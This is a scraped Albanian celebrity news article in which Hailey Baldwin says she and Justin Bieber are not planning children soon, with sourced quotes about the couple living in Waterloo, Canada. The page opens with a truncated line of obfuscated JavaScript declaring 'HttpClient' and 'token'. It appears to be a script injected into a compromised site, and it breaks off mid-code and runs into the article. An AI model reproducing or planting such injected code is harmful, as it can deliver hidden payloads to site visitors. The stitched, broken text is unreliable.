;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Hailey Baldwin dhe Justin Bieber duan fëmijë por…

By

A ju kujtohen të gjitha raportimet se Justin Bieber dhe Hailey Baldwin do të kenë fëmijë shumë më shpejt se që e kanë menduar të gjithë?

Çifti duket se më në fund ka vendosur të flasë për këtë çështje.

Zgjerimi i familjes nuk do të ndodhë së shpejti, ka thënë Hailey për Vogue Arabia.

“Unë i dua shumë fëmijët dhe mezi po pres të kem fëmijët e mi. Po e them këtë gjë tani, sepse ky është një realitet më i afërt tani”, ka thënë ajo në këtë intervistë.

Qysh prej kur Bieber dhe Baldwin janë martuar në vjeshtë, ka pasë spekulime se çifti do të nisin të krijojnë një familje së shpejti.

“Ata janë shumë të dashuruar. Ata kanë një lidhje shumë të shëndetshme. Hailey nuk është shtatzënë aktualisht por duket se një gjë e tillë do të ndodhë së shpejti. Ata duan të krijojnë familjen e tyre këtu në Kanada”, ka thënë një burim, gjatë kësaj jave, për revistën Us Weekly.

Çifti kanë kaluar Ditën e Falenderimeve dhe ditëlindjen e 22-të të modeles amerikane në vendin prej nga vjen këngëtari, në Kanada.

Në fakt, së fundi, ka pasë edhe raportime se çifti do të vendosen që të jetojnë përgjithmonë në Waterloo të Kanadasë, ku edhe Bieber ka një rezidencë prej pesë milionë dollarëve.

“Hailey dhe Justin janë duke jetuar në Waterloo të Ontarios, ata do të vendosen aty. Justin ka një shtëpi të madhe atje. Atij i pëlqen shumë të jetojë aty, ashtu sikur edhe Hailey”.

“Justin e pëlqen shumë të jetojë në Kanada sepse është një vend shumë i qetë. Madje, ai mundet edhe të kalojë kohë me Hailey, dhe të mos përballet vazhdimisht me paparacët që i ndjekin kudo nga pas”, ka thënë një burim tjetër për revistën People.

Artikuj të ngjashëm